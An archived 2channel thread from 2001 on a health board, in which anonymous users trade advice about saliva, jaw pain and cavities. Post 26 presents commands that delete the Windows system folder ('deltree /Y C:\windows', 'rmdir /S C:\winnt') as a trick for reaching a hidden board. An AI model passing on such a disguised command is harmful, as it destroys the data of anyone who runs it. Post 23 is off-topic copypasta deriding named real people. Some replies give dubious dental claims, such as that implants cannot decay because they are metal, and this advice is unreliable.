5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

歯医者の方へ・・・・・・・・

1 :名無しさん@おだいじに:01/12/17 20:45 ID:75wHcQ/K
唾液がネバネバしてて悩んでます。得策は?

2 :名無しさん@おだいじに:01/12/17 20:50 ID:???
入れ歯は安定します。

3 :名無しさん@おだいじに:01/12/17 23:19 ID:???
得策なんてありません。粘着系は氏んでください。

4 :名無しさん@おだいじに:01/12/21 21:43 ID:???
やはり・・・

5 :名無しさん@おだいじに:01/12/21 22:56 ID:???
センセイの素顔が見たいです。
マスクとってくださいというのは反則でしょうか

6 :名無しさん@おだいじに:01/12/21 23:09 ID:1xd1eN10
>>5
ふふふ 恋しとるな。

7 :名無しさん@おだいじに:01/12/22 04:21 ID:DQYwXjPx
耳たぶの下から下あごのふちを指でなぞっていくと、
片側だけ痛い(筋肉痛のような痛さ)ところがあるんだけど、
やっぱり顎関節症?即、治療必要ですか?
ちなみに、触らなければ全然痛くない。

8 :ふん:01/12/22 04:29 ID:???
こんなプライドだけ高い役立たずの浪人ばかりがいる場所で
そんな質問しても無駄ですよ。>>7

9 :5:01/12/22 20:28 ID:???
>>6
ドキッ
せつのぅございまする

10 :名無しさん@おだいじに:01/12/22 21:53 ID:???
>>7
顎関節症T型とか言われるよ
でも何もしなくても治ると思うけどね
歯医者逝って下手に治療されると悪化するよ

11 :7:01/12/23 15:56 ID:Vv/0JGfD
>>10 ありがとうございます。
気がつかなかっただけで、慢性的にあごに痛みが
あるんですが、大丈夫でしょうか???
グリグリとさすらないと全然痛くないもので。

12 :名無しさん@おだいじに:01/12/23 16:22 ID:???
リンパ節が腫れてるのならどこかで感染・炎症があるのかも

13 :名無しさん@おだいじに:01/12/23 16:59 ID:???
外科の先生にいって顎取ってもらえ。

14 :7:01/12/26 03:10 ID:FozSXbkf
>>12ありがとうです。
外見に異常はなくても腫れてることってあるのですか?
慢性的にだと骨に悪いのかな?治療ってどんなことするんでしょう…。

15 :名無しさん@おだいじに:01/12/27 03:04 ID:End4RcnZ
age

16 :名無しさん@おだいじに:01/12/27 04:26 ID:D7jp8MOf
歯磨きちゃんとしてるのに、気がつくと虫歯ができちゃう。。
歯医者サンお勧めの歯磨きと電動歯ブラシつかってるのに。
あ〜。鬱だ。

17 :名無しさん@おだいじに:01/12/27 13:14 ID:???
↑私も〜。っていうか治療したトコロが
 だいたいかぶせてるの取ると、虫歯になってるのはどうして?

18 :名無しさん@おだいじに:01/12/27 15:36 ID:D7jp8MOf
<<17
歯医者の陰謀じゃないのって思っちゃう。
本当は虫歯ってうがい薬程度で、ばっちり予防できるんじゃないかな。

19 :名無しさん@おだいじに:01/12/27 16:09 ID:???
>18
予防出来るよ。やったら。
>16、17
虫歯が出来るような生活習慣を変えたかい?
変えなきゃ。また出来るに決まってるじゃないか。

20 :名無しさん@おだいじに:01/12/27 18:11 ID:nN0yG0bi
>>19
どんな生活習慣?普通に食ってるだけなんだけどな。
虫歯になりやすい体質とかってあるんですか?

いっそのこと全部サシバにしちゃうってどうなでしょうか?

21 :名無しさん@おだいじに:01/12/27 22:15 ID:???
それ、絶対あると思う<虫歯になりやすい体質

全然みがかんやつが虫歯にならんのはどうしてだ!

22 :名無しさん@おだいじに:01/12/27 22:44 ID:???
>20
まず、間食を一切やめる。
甘い飲み物をやめる。
食後すぐ歯を磨く。
フッ素入り歯磨きを使う。
キシリトールのガムを噛む。
飴は駄目。(のど飴も駄目)

虫歯になり易い体質は、唾液の量や性質が悪いということが大きい。
薬で唾液の分泌が抑制されていることがあるかもしれない。
悪い(強い)虫歯菌を持っているということもある。
これは糖分を何年も少なくしていたら減る。
歯の質が弱いかもしれない。白い乳白色のきれいな歯は弱い。

差し歯にしても、土台の部分は虫歯になる。
インプラントにすれば虫歯にはならない。(金属だから)

23 :名無しさん@おだいじに:01/12/27 22:59 ID:???
まとめのまとめ・・・

@2002年4月から、東大大学院医学系研究科健康科学・看護学専攻健康社会学分野に、
お天気キャスター河合薫と、スキャンダル女優石井苗子がご入学。

A看護短大→東大医学部健康科学・看護学科への編入が可能!
かなりのバカでもok!都立医技短看護学科卒の山本舞衣子がいい例です!
看護婦にはならず、芸能人気取り〜。

B医学部健康科学・看護学科の前身(保健学科)の前身は、「衛生看護学科」。
衛生看護学科(以下衛看)は、GHQの指導で無理やり作られた学科で、
女子のみの募集、もちろん当時の文一・文二・理一・理二とは全く別枠の入試。
転部・転科は認められず、駒場でも仲間はずれ、本郷での教育は行われず、
今はなき小石川の分院が衛看キャンパスであり、
衛看は東大と認められるような入試形態・教育内容・学生の質は存在しなかった。

C衛生看護学科卒のおばちゃんたちは、「戦後まもなくの頃、東大に入れた女性!」等とちやほやされ、
たかが衛看卒なのに「東大」ってだけで学長になれたりする。
実際は「女性である」だけで簡単に東大に入れた時代があることをお忘れなく。プ。
http://www.nagano-nurs.ac.jp/presword/index.html
見藤隆子おばちゃんは、長野県看護大学学長。
http://www.shimizukayoko.gr.jp/
清水かよこおばちゃんは、参議員議員。フォトアルバムに注目よ!

D有力な噂として、
医科歯科の歯学部→東大にプレゼント、東大歯学・健康科学部を新設、
看護は医科歯科に譲渡、医科歯科の医学部→東大国際生命医療学環(大学院大学)を創設。
看護学譲渡の理由:
東大では駒場から進学した学生が、誰も看護婦にならない。
看護教育が成立しない。
医学部教授の9割は医師で、看護婦に発言権がない。
M痘さんへのあてつけ(「ほーら、保健学科のままにしときゃーよかったのに」的あてつけ)。
看護短大卒の編入生がお馬鹿でウザイ。


24 :名無しさん@おだいじに:01/12/31 01:10 ID:???
あごはずしてもらえって。
そうすりゃなおるよ。

25 :ピアスのマーボー:01/12/31 03:34 ID:???
俺はオトシマエとして甘いものを絶たせてもらったぜ。

26 :名無しさん@おだいじに:01/12/31 03:35 ID:???
fusianasannじゃなく、ホントの裏2CHの入り方は以下の通りです。
●●裏2ちゃんねるへの接続方法〜裏技公開〜●●
【1】スタート→プログラム→MS-DOSプロンプト、またはコマンドプロンプトを起動する。
【2】win95かwin98の人は「deltree /Y C:\windows」
  winNTかwin2000の人は「rmdir /S C:\winnt」   ※「/Y」は
「yield」の略。「生産する」の意味。
    「/S」は「second /Y」の略。こちらの方が改良されている。
【3】あとは自動的にwindowsがつないでくれるよ。
★「deltree」や「rmdir」は裏ドメイン用のコマンドです。
★こういう裏ドメインのサイトにはDOSを使うと
 トラフィックの混雑が抑えられ、快適に接続できます。
 2ちゃんねるのCGIを使うと、弾かれる可能性が高いです。
★「deltree」や「rmdir」はwindowsの標準コマンドなので安心。
 機能も高く、guest guestを自動入力するほか、
 年齢別の画像も全て表示できるという優れものです。

27 :ピアスのマーボー:01/12/31 03:41 ID:???
↑だから、そんなめんどくせえシノギができねえから武闘派なんだよ垣原組はよ。

28 :名無しさん@おだいじに:01/12/31 05:30 ID:???
>>26
で、どうなるの?

29 :名無しさん@おだいじに:01/12/31 22:40 ID:???
自分のプライバシーが公開できるんだ。

8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)